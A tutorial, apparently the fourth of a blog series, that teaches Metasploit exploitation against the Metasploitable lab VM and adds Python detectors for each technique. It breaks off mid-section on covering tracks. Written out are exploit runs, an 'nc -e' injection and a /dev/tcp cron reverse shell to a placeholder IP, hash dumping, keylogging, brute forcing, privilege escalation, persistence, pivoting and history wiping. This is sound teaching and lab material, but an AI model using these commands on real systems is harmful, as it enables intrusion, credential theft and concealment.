Security Mar 8, 2026 • 28 min read

Exploitation: From Vulnerability to Shell

Master Metasploit Framework, exploit real vulnerabilities, escalate privileges, and pivot through networks. The complete guide to ethical exploitation techniques.

Lee Foropoulos

The Hacker's Path: A 5-Part Series

Part 1: Introduction | Part 2: Flipper Mastery | Part 3: Kali Fundamentals | Part 4: Exploitation | Part 5: The Full Audit

In Parts 1-3, you built your toolkit. You can clone badges, map networks, capture handshakes, and identify every service running on a target. You see vulnerabilities everywhere now. But seeing a vulnerability and exploiting it are very different skills.

This is where it gets real. Today you'll learn to use the Metasploit Framework, the same tool used by professional penetration testers worldwide. You'll exploit your first vulnerability, establish persistence, escalate privileges, and learn to pivot through a network.

The Line You Must Not Cross

Everything in this article must be practiced on systems you own or have explicit written permission to test. Unauthorized access to computer systems is a federal crime carrying penalties up to 20 years imprisonment. "I was just learning" is not a defense. Build a lab, use intentionally vulnerable VMs, and never touch systems you don't own.

Part 1: Building Your Attack Lab

Before exploiting anything, you need targets. Real penetration testers use isolated lab environments with intentionally vulnerable machines. You'll do the same.

The Essential Lab Setup

What You'll Need

  • Kali Linux VM - Your attack machine (from Part 3)
  • Metasploitable 2 - Intentionally vulnerable Linux VM (SourceForge)
  • Metasploitable 3 - Vulnerable Windows/Linux VM (GitHub)
  • DVWA - Damn Vulnerable Web Application (GitHub)
  • VulnHub VMs - CTF-style vulnerable machines (vulnhub.com)

Project: Lab Network Setup

Time: 45 minutes

  1. Download Metasploitable 2 from SourceForge
  2. Import into VirtualBox/VMware
  3. Configure network: Set both Kali and Metasploitable to "Host-Only" or "Internal Network"
  4. Boot Metasploitable (default login: msfadmin / msfadmin)
  5. Note the IP address: ifconfig
  6. From Kali, verify connectivity: ping METASPLOITABLE_IP
  7. Run initial scan: sudo nmap -sV -sC METASPLOITABLE_IP

Verify: You should see dozens of open ports. Metasploitable is designed to be compromised.

Your nmap scan of Metasploitable should reveal services like FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL, and more, many running outdated, vulnerable versions. This is your playground.

Part 2: Metasploit Framework Fundamentals

Metasploit is not just a tool. It's an ecosystem. It contains thousands of exploits, payloads, auxiliary modules, and post-exploitation tools. Understanding its structure is essential.

4,000+ exploit modules are available in the Metasploit Framework, covering every major platform and vulnerability class.

Starting Metasploit

```bash
# Initialize the database (first time only)
sudo msfdb init

# Start Metasploit console
msfconsole

# You'll see the Metasploit banner and prompt:
msf6 >
```

The Metasploit Structure

Metasploit organizes everything into modules:

  • Exploits - Code that takes advantage of vulnerabilities
  • Payloads - Code that runs after exploitation (shells, meterpreter)
  • Auxiliary - Scanners, fuzzers, and other utilities
  • Post - Post-exploitation modules for persistence, pivoting
  • Encoders - Obfuscate payloads to evade detection

```bash
# Search for modules
msf6 > search type:exploit platform:linux smb

# Search by CVE
msf6 > search cve:2017-0144

# Search by name
msf6 > search vsftpd

# Get info about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor
```

The Exploitation Workflow

Every Metasploit exploitation follows the same pattern:

  1. Select an exploit - use exploit/path/to/module
  2. Set options - Target IP, ports, credentials
  3. Select a payload - What runs after exploitation
  4. Execute - exploit or run
The Metasploit Framework provides a structured approach to exploitation, turning vulnerability research into repeatable, professional workflows.

Part 3: Your First Exploit

Let's exploit one of the most famous backdoors in history: the vsftpd 2.3.4 backdoor. In 2011, someone inserted a backdoor into the vsftpd source code. If you send a username ending with :), a shell opens on port 6200.

Metasploitable 2 runs this exact version.

```bash
# Start Metasploit
msfconsole

# Search for the exploit
msf6 > search vsftpd

# Select the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

# Set the target
msf6 exploit(...) > set RHOSTS 192.168.56.101

# Run the exploit
msf6 exploit(...) > exploit

# If successful:
[*] Command shell session 1 opened
[+] Got shell!

# You now have a root shell on the target
whoami
root
id
uid=0(root) gid=0(root)
```

That's it. One vulnerable service, one exploit, root access. This is why keeping software updated matters.

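The flip side of this exploit is how easy it is to spot. The trigger is a USER command containing ":)", the backdoored release announces itself in the service banner, and the resulting shell listens on TCP 6200. The following detector is an added example, not code from the original article: it scans FTP log lines for the trigger, checks an nmap -sV service line for the affected version, and flags an unexpected 6200 listener. The log lines are constructed and modelled on vsftpd's protocol log format (log_ftp_protocol=YES); the field layout is an assumption.

```python
import re
from typing import Dict, List, Set

# Constructed sample lines in the style of vsftpd's protocol log; not real traffic.
SAMPLE_FTP_LOG = """\
Mon Mar  9 10:01:02 2026 [pid 2031] CONNECT: Client "192.168.56.1"
Mon Mar  9 10:01:03 2026 [pid 2031] FTP command: Client "192.168.56.1", "USER anonymous"
Mon Mar  9 10:01:03 2026 [pid 2031] FTP command: Client "192.168.56.1", "PASS <password>"
Mon Mar  9 10:02:10 2026 [pid 2044] CONNECT: Client "192.168.56.102"
Mon Mar  9 10:02:11 2026 [pid 2044] FTP command: Client "192.168.56.102", "USER lab:)"
Mon Mar  9 10:02:11 2026 [pid 2044] FTP command: Client "192.168.56.102", "PASS x"
"""

# Capture the client IP and the USER argument from an "FTP command" line.
FTP_USER_RE = re.compile(r'FTP command: Client "([^"]+)", "USER ([^"]*)"')

def find_backdoor_triggers(log_text: str) -> List[Dict[str, str]]:
    """Return every USER command whose argument contains the ':)' trigger."""
    hits = []
    for line in log_text.splitlines():
        m = FTP_USER_RE.search(line)
        if m and ":)" in m.group(2):
            hits.append({"client": m.group(1), "user": m.group(2), "line": line})
    return hits

# Only the 2.3.4 release carried the backdoor; 2.3.45 or 2.3.4x must not match.
BACKDOORED_BANNER = re.compile(r"vsftpd 2\.3\.4\b")

def banner_is_backdoored_version(nmap_service_line: str) -> bool:
    """True if an 'nmap -sV' service line reports the backdoored vsftpd release."""
    return bool(BACKDOORED_BANNER.search(nmap_service_line))

def unexpected_6200_listener(open_ports: Set[int]) -> bool:
    """The backdoor shell binds TCP 6200; on an FTP server that port should not be open."""
    return 6200 in open_ports

if __name__ == "__main__":
    for h in find_backdoor_triggers(SAMPLE_FTP_LOG):
        print(f"[ALERT] vsftpd backdoor trigger from {h['client']}: USER {h['user']!r}")
    print("backdoored version:", banner_is_backdoored_version("21/tcp open ftp vsftpd 2.3.4"))
    print("6200 listening:", unexpected_6200_listener({21, 22, 6200}))
```

Run it against your own lab logs after the exploit above and the trigger line from your Kali IP should be the only hit; the version check is the cheaper control, because a host that never runs 2.3.4 never needs the other two.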

Project: Exploit vsftpd Backdoor

Time: 15 minutes

Prerequisites: Metasploitable 2 running, Kali on same network

  1. Verify FTP is running: nmap -sV -p 21 TARGET_IP
  2. Launch msfconsole
  3. Search, select, and configure the vsftpd exploit
  4. Run the exploit
  5. Once you have a shell, explore: cat /etc/shadow

Success criteria: You can read /etc/shadow, which only root can access.

Part 4: Understanding Payloads

A payload is what runs after the exploit succeeds. The basic shell we got above is simple, but Metasploit offers much more powerful options.

Payload Types

  • Singles - Self-contained, one-shot payloads (add user, run command)
  • Stagers - Small payloads that establish a connection, then download the main payload
  • Stages - The main payload downloaded by the stager (Meterpreter)

```bash
# List compatible payloads for current exploit
msf6 exploit(...) > show payloads

# Set a specific payload
msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp

# Payload naming convention:
# platform/arch/payload_type/connection_type
# linux/x86/meterpreter/reverse_tcp
# windows/x64/shell/bind_tcp
```

Reverse vs Bind Shells

  • Reverse shell - Target connects back to you. Better for bypassing firewalls (outbound usually allowed).
  • Bind shell - Target opens a port for you to connect. Easier to detect, often blocked by firewalls.

```bash
# For reverse shells, you must set your IP
msf6 exploit(...) > set LHOST YOUR_KALI_IP
msf6 exploit(...) > set LPORT 4444

# Metasploit starts a listener automatically when you exploit
```
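The naming convention and the reverse/bind distinction are easier to internalise when you take payload names apart mechanically. The parser below is an added example (my own code, not part of Metasploit or of the original article): it splits a payload path into platform, architecture, stage type and handler, tells a staged name (type and handler separated by "/") from a stageless single (joined with "_"), and maps the direction to the control that sees it on the network. The set of stage-type names and the control-point wording are this example's assumptions.

```python
from dataclasses import dataclass

# Stage types that appear as their own path component in a staged payload name (assumed list).
STAGE_TYPES = {"meterpreter", "shell", "vncinject", "dllinject", "upexec", "powershell", "custom"}

@dataclass
class PayloadInfo:
    platform: str
    arch: str        # "" when the name carries no explicit architecture
    stage: str       # "meterpreter", "shell", ...; "" for a plain single such as cmd/unix/reverse
    handler: str     # e.g. "reverse_tcp", "bind_tcp", "reverse"
    staged: bool     # True when the stage type is its own component (stager downloads the stage)
    direction: str   # "reverse", "bind" or "unknown"
    transport: str   # "tcp", "http", "https", ... or "" when not encoded

def parse_payload_name(name: str) -> PayloadInfo:
    parts = name.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a Metasploit payload path: {name!r}")
    platform, handler = parts[0], parts[-1]
    staged = len(parts) >= 3 and parts[-2] in STAGE_TYPES
    stage = parts[-2] if staged else ""
    middle = parts[1:-2] if staged else parts[1:-1]
    arch = middle[0] if middle else ""
    if not staged:
        # Stageless singles join type and handler with "_", e.g. meterpreter_reverse_tcp.
        for t in STAGE_TYPES:
            if handler.startswith(t + "_"):
                stage, handler = t, handler[len(t) + 1:]
                break
    if handler.startswith("reverse"):
        direction = "reverse"
    elif handler.startswith("bind"):
        direction = "bind"
    else:
        direction = "unknown"
    tokens = handler.split("_")
    transport = tokens[1] if len(tokens) > 1 else ""
    return PayloadInfo(platform, arch, stage, handler, staged, direction, transport)

def control_points(info: PayloadInfo) -> str:
    """Which defensive control observes this payload's network behaviour."""
    if info.direction == "reverse":
        return "outbound connection from the host to LHOST:LPORT; egress filtering and outbound-connection logging see it"
    if info.direction == "bind":
        return "new listening socket on the host; host firewall rules and listening-port baselines see it"
    return "direction not encoded in the name; read the module description"

if __name__ == "__main__":
    for n in ("linux/x86/meterpreter/reverse_tcp", "windows/x64/shell/bind_tcp",
              "cmd/unix/reverse", "windows/x64/meterpreter_reverse_tcp"):
        info = parse_payload_name(n)
        print(f"{n:45} staged={info.staged!s:5} {info.direction:8} {info.transport:6} -> {control_points(info)}")
```

The "outbound usually allowed" point from the bullet list is exactly what this classification makes visible: every reverse payload on the list is a connection your egress rules and proxy logs could have refused or recorded.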

Meterpreter: The Ultimate Payload

Meterpreter is Metasploit's most powerful payload. It runs entirely in memory (no files on disk), provides encrypted communication, and includes dozens of built-in commands for post-exploitation.

```bash
# Meterpreter commands (once you have a session)
meterpreter > sysinfo          # System information
meterpreter > getuid           # Current user
meterpreter > pwd              # Current directory
meterpreter > ls               # List files
meterpreter > download file    # Download file to Kali
meterpreter > upload file      # Upload file to target
meterpreter > shell            # Drop to system shell
meterpreter > hashdump         # Dump password hashes
meterpreter > screenshot       # Take screenshot
meterpreter > keyscan_start    # Start keylogger
meterpreter > keyscan_dump     # Dump keystrokes
meterpreter > background       # Background this session
```

Part 5: More Exploitation Techniques

Exploiting Samba (SMB)

Metasploitable 2 runs a vulnerable version of Samba. Like the infamous EternalBlue exploit used in WannaCry, this attack goes through the SMB service, although the bug here is a command injection in Samba's "username map script" option rather than a memory-corruption flaw in the SMB implementation.

```bash
# Search for Samba exploits
msf6 > search type:exploit samba

# The "username map script" vulnerability
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS TARGET_IP
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
msf6 exploit(...) > set LHOST YOUR_IP
msf6 exploit(...) > exploit

[*] Command shell session 2 opened
```

Exploiting Weak Credentials

Not every compromise requires a software vulnerability. Weak passwords are everywhere.

```bash
# SSH brute-force auxiliary module
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS TARGET_IP
msf6 auxiliary(...) > set USERNAME root
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > set STOP_ON_SUCCESS true
msf6 auxiliary(...) > run

# For known credentials
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'
```
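Every run of ssh_login writes a burst of "Failed password" lines into the target's auth.log, and a wordlist run that eventually succeeds ends with an "Accepted password" from the same source. The detector below is an added example (not from the original article or from Metasploit): it parses sshd lines in syslog format, flags any source with a threshold of failures inside a sliding window, and reports whether a successful login from that source followed. The log excerpt is constructed; the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt in syslog format; not a real capture.
AUTH_LOG = """\
Mar  9 10:15:01 metasploitable sshd[4011]: Failed password for root from 192.168.56.102 port 40100 ssh2
Mar  9 10:15:02 metasploitable sshd[4013]: Failed password for root from 192.168.56.102 port 40101 ssh2
Mar  9 10:15:03 metasploitable sshd[4015]: Failed password for root from 192.168.56.102 port 40102 ssh2
Mar  9 10:15:04 metasploitable sshd[4017]: Failed password for invalid user admin from 192.168.56.102 port 40103 ssh2
Mar  9 10:15:05 metasploitable sshd[4019]: Failed password for root from 192.168.56.102 port 40104 ssh2
Mar  9 10:15:06 metasploitable sshd[4021]: Failed password for msfadmin from 192.168.56.102 port 40105 ssh2
Mar  9 10:15:09 metasploitable sshd[4030]: Accepted password for msfadmin from 192.168.56.102 port 40112 ssh2
Mar  9 11:00:00 metasploitable sshd[4101]: Failed password for msfadmin from 192.168.56.1 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def parse_auth_log(text, year=2026):
    """Return (timestamp, result, user, src) tuples for sshd password events, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    events.sort(key=lambda e: e[0])
    return events

def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failures inside a sliding window and
    note whether a successful login from that source came afterwards."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, src in parse_auth_log(text):
        (failures if result == "Failed" else successes)[src].append((ts, user))
    window = timedelta(seconds=window_seconds)
    alerts = []
    for src, fails in failures.items():
        for i in range(len(fails)):
            in_window = [f for f in fails[i:] if f[0] - fails[i][0] <= window]
            if len(in_window) >= threshold:
                last_fail = in_window[-1][0]
                later = [(ts, u) for ts, u in successes.get(src, []) if ts >= last_fail]
                alerts.append({
                    "src": src,
                    "failures": len(in_window),
                    "first": fails[i][0].isoformat(),
                    "success_after": bool(later),
                    "success_user": later[0][1] if later else None,
                })
                break  # one alert per source is enough
    return alerts

if __name__ == "__main__":
    for a in detect_bruteforce(AUTH_LOG):
        print(f"[ALERT] {a['src']}: {a['failures']} failures from {a['first']}; "
              f"success afterwards: {a['success_after']} ({a['success_user']})")
```

The "success after failures" flag is the one worth paging on: a burst of failures alone is background noise on any internet-facing host, but a burst followed by an accepted login from the same source is the signature of the second ssh_login run above. Fail2ban and sshd's own MaxAuthTries address the same pattern at the source.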

Web Application Exploitation

Metasploitable includes several vulnerable web applications. Let's exploit a PHP code injection.

```bash
# First, browse to http://TARGET/mutillidae/
# Find the "User Lookup" page (vulnerable to SQLi and code injection)

# Use Metasploit's web exploits
msf6 > search type:exploit php

# Or exploit manually with command injection:
# In vulnerable input field:
; cat /etc/passwd
; nc -e /bin/bash YOUR_IP 4444
```

Project: Exploit Three Different Services

Time: 60 minutes

Target: Metasploitable 2

  1. Exploit vsftpd backdoor (FTP - port 21) and get root shell
  2. Exploit Samba usermap_script (SMB - port 139/445) and get root shell
  3. Crack SSH credentials (port 22) using auxiliary/scanner/ssh/ssh_login
  4. Document each exploitation: module used, options set, result

Bonus: Explore the web applications on port 80 and find manual exploitation vectors.

Part 6: Post-Exploitation

Getting a shell is just the beginning. Real penetration tests require demonstrating what an attacker could do with that access. This is post-exploitation.

Information Gathering

```text
# From a Meterpreter session
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24
Architecture: i686
Meterpreter : x86/linux

# Network information
meterpreter > ipconfig
meterpreter > route
meterpreter > arp
```

```bash
# From a regular shell
cat /etc/passwd       # All users
cat /etc/shadow       # Password hashes (requires root)
cat /etc/hosts        # Network mappings
netstat -tulpn        # Open ports
ps aux                # Running processes
crontab -l            # Scheduled tasks
```

Credential Harvesting

```text
# Dump password hashes
meterpreter > hashdump
root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash
```

```bash
# Or from shell
cat /etc/shadow

# Crack hashes offline with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Or hashcat (faster with GPU)
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt
```

Establishing Persistence

Persistence means maintaining access even after reboots or when your initial exploit vector is patched.

```bash
# Add a new user with sudo access
useradd -m -s /bin/bash hacker
echo "hacker:password123" | chpasswd
usermod -aG sudo hacker

# Add SSH key for passwordless access
mkdir /home/hacker/.ssh
echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys

# Cron-based reverse shell (reconnects every minute)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root

# Metasploit persistence module
meterpreter > run persistence -h
meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP
```

Persistence = Evidence

Every persistence mechanism leaves traces. In a real penetration test, you document what you could do, then clean up. Leaving backdoors on client systems is unprofessional and potentially illegal. In your lab, go wild, but understand the implications.
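Here is what "persistence = evidence" looks like in practice. Each command in the block above leaves a specific artifact: a new member of the sudo group, an authorized_keys file that was not there before, and a root crontab line with a reverse-shell idiom in it. The auditor below is an added example (my own code, not from the original article) that reads /etc/passwd, /etc/group, a crontab and a map of authorized_keys files and reports those artifacts against an allow-list you supply; it also catches the extra uid-0 account that the writable-/etc/passwd trick in Part 7 produces. All file contents are constructed, and the allow-list of expected sudo members is this example's assumption.

```python
import re

# Constructed file contents mirroring the artifacts the persistence commands create.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
hacker:x:1001:1001::/home/hacker:/bin/bash
backup:x:0:0:root:/root:/bin/bash
"""
GROUP = "sudo:x:27:msfadmin,hacker\n"
ROOT_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/4444 0>&1'
"""
# path -> file body, as collected from every home directory on the host (constructed).
AUTHORIZED_KEYS = {
    "/home/hacker/.ssh/authorized_keys": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC... lab-key\n",
}

def extra_uid0_accounts(passwd_text):
    """Accounts with uid 0 whose name is not 'root'."""
    out = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            out.append(f[0])
    return out

def sudo_group_members(group_text, expected):
    """Members of the sudo group that are not on the expected allow-list."""
    for line in group_text.splitlines():
        f = line.split(":")
        if f[0] == "sudo" and len(f) == 4:
            members = [m for m in f[3].split(",") if m]
            return sorted(set(members) - set(expected))
    return []

# Reverse-shell idioms that have no business in a cron table.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|bash -i|\bnc(?:at)?\b.*\s-e\b|mkfifo", re.I)

def suspicious_cron_entries(cron_text):
    """Cron lines that contain reverse-shell idioms."""
    return [l for l in cron_text.splitlines() if REVERSE_SHELL_RE.search(l)]

def unexpected_authorized_keys(keys_by_path, expected_paths):
    """Non-empty authorized_keys files outside the set you know about."""
    return sorted(p for p, body in keys_by_path.items()
                  if p not in expected_paths and body.strip())

def audit():
    return {
        "uid0": extra_uid0_accounts(PASSWD),
        "sudo": sudo_group_members(GROUP, expected=["msfadmin"]),
        "cron": suspicious_cron_entries(ROOT_CRONTAB),
        "keys": unexpected_authorized_keys(AUTHORIZED_KEYS, expected_paths=set()),
    }

if __name__ == "__main__":
    for kind, findings in audit().items():
        for item in findings:
            print(f"[{kind}] {item}")
```

On a real host you would feed these functions the live files and compare against a baseline taken at build time; the point of the exercise is that every row of the persistence block above shows up in this output, which is why the cleanup step of an engagement matters.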

Part 7: Privilege Escalation

Often you gain initial access as a low-privileged user. Escalating to root/admin is usually required to achieve test objectives.

Linux Privilege Escalation

```bash
# Current user context
id
whoami

# SUID binaries (run as owner regardless of who executes)
find / -perm -4000 -type f 2>/dev/null

# World-writable directories
find / -writable -type d 2>/dev/null

# Sudo permissions
sudo -l

# Kernel version (for kernel exploits)
uname -a

# Running processes as root
ps aux | grep root

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
```

Automated Enumeration Scripts

```bash
# Upload and run LinPEAS
# From Kali, host the script:
python3 -m http.server 8000

# From target:
wget http://YOUR_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinPEAS highlights potential vectors in colors:
# RED/YELLOW = Critical findings, likely exploitable
```

Common Linux Privesc Vectors

```bash
# 1. Sudo misconfiguration
sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c '!sh'
# Instant root shell

# 2. SUID binary exploitation
# If /usr/bin/find has SUID bit:
find . -exec /bin/sh -p \;

# 3. Writable /etc/passwd
# Generate password hash:
openssl passwd -1 mypassword
# Add to /etc/passwd:
echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd

# 4. Cron job exploitation
# If a cron runs a writable script as root:
echo 'chmod +s /bin/bash' >> /path/to/cron/script
# Wait for cron, then:
/bin/bash -p
# Root shell
```
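The four vectors above are all configuration mistakes, which means they can be found by the administrator before anyone else does. The checker below is an added example (not from the original article or from LinPEAS): it parses `sudo -l` output for rules that grant ALL or a binary with a well-known shell escape, filters a SUID list against the same set, and flags root-owned cron scripts that are world-writable. The binary list is a short sample of the class of binaries that GTFOBins catalogues and is not exhaustive; the sudo output, SUID list and stat tuples are constructed.

```python
import stat

# Binaries with well-known shell escapes when run with elevated privileges.
# A short sample of the class GTFOBins catalogues; extend it for your estate.
SHELL_ESCAPE_BINS = {"vim", "vi", "find", "less", "more", "nmap", "awk", "python", "python3",
                     "perl", "bash", "sh", "env", "nano", "tar", "cp", "mv"}

# Constructed 'sudo -l' output for the msfadmin user.
SUDO_L_OUTPUT = """\
Matching Defaults entries for msfadmin on metasploitable:
    env_reset, mail_badpass

User msfadmin may run the following commands on metasploitable:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/apt-get
"""

# Constructed output of: find / -perm -4000 -type f
SUID_LIST = ["/usr/bin/passwd", "/usr/bin/find", "/bin/su", "/usr/bin/sudo"]

# Constructed (path, st_mode, st_uid, st_gid) tuples for scripts referenced from root's cron.
CRON_SCRIPTS = [
    ("/usr/local/bin/backup.sh", 0o100777, 0, 0),
    ("/usr/local/bin/rotate.sh", 0o100755, 0, 0),
]

def _base(path):
    return path.rsplit("/", 1)[-1]

def risky_sudo_rules(sudo_output):
    """(command, nopasswd) for sudo rules that grant ALL or a shell-escape binary."""
    findings = []
    for line in sudo_output.splitlines():
        line = line.strip()
        if not line.startswith("("):          # rule lines start with the run-as spec, e.g. (ALL)
            continue
        _runas, _, cmds = line.partition(")")
        nopasswd = "NOPASSWD:" in cmds
        for cmd in cmds.replace("NOPASSWD:", "").split(","):
            cmd = cmd.strip()
            if cmd and (cmd == "ALL" or _base(cmd) in SHELL_ESCAPE_BINS):
                findings.append((cmd, nopasswd))
    return findings

def risky_suid(paths):
    """SUID binaries whose name is in the shell-escape set (find, vim, ...)."""
    return [p for p in paths if _base(p) in SHELL_ESCAPE_BINS]

def writable_root_cron_scripts(entries):
    """Root-owned scripts that anyone can write to: whatever is appended runs as root on schedule."""
    return [path for path, mode, uid, _gid in entries if uid == 0 and mode & stat.S_IWOTH]

def audit():
    return {
        "sudo": risky_sudo_rules(SUDO_L_OUTPUT),
        "suid": risky_suid(SUID_LIST),
        "cron": writable_root_cron_scripts(CRON_SCRIPTS),
    }

if __name__ == "__main__":
    for kind, findings in audit().items():
        print(kind, findings)
```

The fixes are as mundane as the findings: remove the sudo rule or restrict it to a wrapper that takes no arguments, `chmod u-s` the binary that does not need SUID, and `chmod o-w` the cron script. Vector 3 (a writable /etc/passwd) shows up as an extra uid-0 account, which the persistence auditor in Part 6 already reports.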

Windows Privilege Escalation

If you're testing Windows targets (Metasploitable 3), the techniques differ:

```text
# From Meterpreter on Windows
meterpreter > getuid
Server username: VICTIM\lowpriv_user

meterpreter > getsystem
[+] ...got SYSTEM

# If getsystem fails, try:
meterpreter > run post/multi/recon/local_exploit_suggester

# Or background and use specific exploit:
meterpreter > background
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > exploit
```

Project: Escalate from User to Root

Time: 45 minutes

Scenario: You have SSH access to Metasploitable as msfadmin (non-root)

  1. SSH to Metasploitable: ssh msfadmin@TARGET
  2. Run id to confirm you're not root
  3. Check sudo permissions: sudo -l
  4. Look for SUID binaries: find / -perm -4000 2>/dev/null
  5. Upload and run LinPEAS
  6. Identify a privesc vector and exploit it

Goal: Obtain a root shell using something other than exploiting a network service.

Privilege escalation transforms limited access into full system control, often through overlooked misconfigurations rather than sophisticated exploits.

Part 8: Pivoting

Pivoting is using a compromised system to attack other systems that aren't directly accessible from your attack machine. This is how attackers move laterally through networks.

The Pivot Scenario

Imagine this network:

  • Your Kali: 192.168.1.100
  • Compromised host: 192.168.1.50 (also connected to 10.0.0.0/24 internal network)
  • Target: 10.0.0.10 (only accessible from 192.168.1.50)

You can't reach 10.0.0.10 directly. But through the compromised host, you can.

Metasploit Routing

```text
# After getting a Meterpreter session on the pivot host
meterpreter > ipconfig
# Shows two interfaces: 192.168.1.50 and 10.0.0.50

meterpreter > run autoroute -s 10.0.0.0/24
[+] Added route to 10.0.0.0/24 via session 1

meterpreter > background

# Now Metasploit routes 10.0.0.0/24 traffic through session 1
msf6 > route print

# Scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(...) > set PORTS 22,80,443,445
msf6 auxiliary(...) > run

# Exploit internal targets through the pivot
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.0.0.10
msf6 exploit(...) > exploit
```

SOCKS Proxy for Full Access

```bash
# Set up a SOCKS proxy through Meterpreter
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(...) > set SRVPORT 1080
msf6 auxiliary(...) > run

# Configure proxychains (/etc/proxychains4.conf)
socks5 127.0.0.1 1080

# Now any tool can access the internal network
proxychains nmap -sT -Pn 10.0.0.10
proxychains curl http://10.0.0.10
proxychains ssh user@10.0.0.10
```

SSH Tunneling (Without Metasploit)

```bash
# Dynamic port forwarding (SOCKS proxy)
ssh -D 1080 user@pivot_host

# Local port forwarding (specific port)
ssh -L 8080:10.0.0.10:80 user@pivot_host
# Now localhost:8080 reaches 10.0.0.10:80

# Remote port forwarding (expose your service to internal network)
ssh -R 4444:localhost:4444 user@pivot_host
# Internal hosts can reach your port 4444 via pivot_host:4444
```
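Whether the pivot is autoroute, a SOCKS proxy or an SSH tunnel, the internal segment sees the same thing: the pivot host's internal address (10.0.0.50 in the scenario above) suddenly talks to most of 10.0.0.0/24 on the scanned ports within seconds. That is a detection opportunity for whoever owns the flow logs of that segment. The sweep detector below is an added example (my own code, not from the original article): it groups flow records by source and destination port and flags a source that reaches a threshold of distinct hosts inside a time window. The flow records are constructed, and the thresholds are this example's assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records (timestamp, src, dst, dport), as a firewall or NetFlow
# export on the 10.0.0.0/24 segment might show them. 10.0.0.50 is the pivot host's
# internal address from the scenario; the eight 445 hits model the portscan module.
FLOWS = [("2026-03-09T12:00:%02d" % i, "10.0.0.50", "10.0.0.%d" % (i + 1), 445) for i in range(8)]
FLOWS += [
    ("2026-03-09T12:00:03", "10.0.0.20", "10.0.0.10", 80),   # ordinary web traffic
    ("2026-03-09T12:00:04", "10.0.0.20", "10.0.0.11", 80),
    ("2026-03-09T12:30:00", "10.0.0.50", "10.0.0.10", 445),  # later, outside the window
]

def detect_sweeps(flows, min_hosts=6, window=timedelta(seconds=60)):
    """Flag a (src, dport) pair that reaches >= min_hosts distinct hosts inside one window."""
    by_key = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_key[(src, dport)].append((datetime.fromisoformat(ts), dst))
    alerts = []
    for (src, dport), recs in by_key.items():
        recs.sort()
        for i, (start, _) in enumerate(recs):
            hosts = {dst for ts, dst in recs[i:] if ts - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"src": src, "dport": dport, "hosts": len(hosts),
                               "start": start.isoformat()})
                break  # one alert per (src, dport)
    return alerts

if __name__ == "__main__":
    for a in detect_sweeps(FLOWS):
        print(f"[ALERT] {a['src']} swept {a['hosts']} hosts on tcp/{a['dport']} from {a['start']}")
```

The same logic works on Zeek conn.log or firewall deny logs; the useful refinement is to baseline which internal hosts normally talk to many peers (monitoring servers, domain controllers) so that a workstation or a web server doing it stands out.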

Part 9: Covering Tracks

Professional penetration testers document their access but clean up after themselves. Understanding how attackers cover tracks also helps you detect intrusions.

```bash
# Clear bash history
history -c
cat /dev/null > ~/.bash_history

# Clear auth logs (requires root)
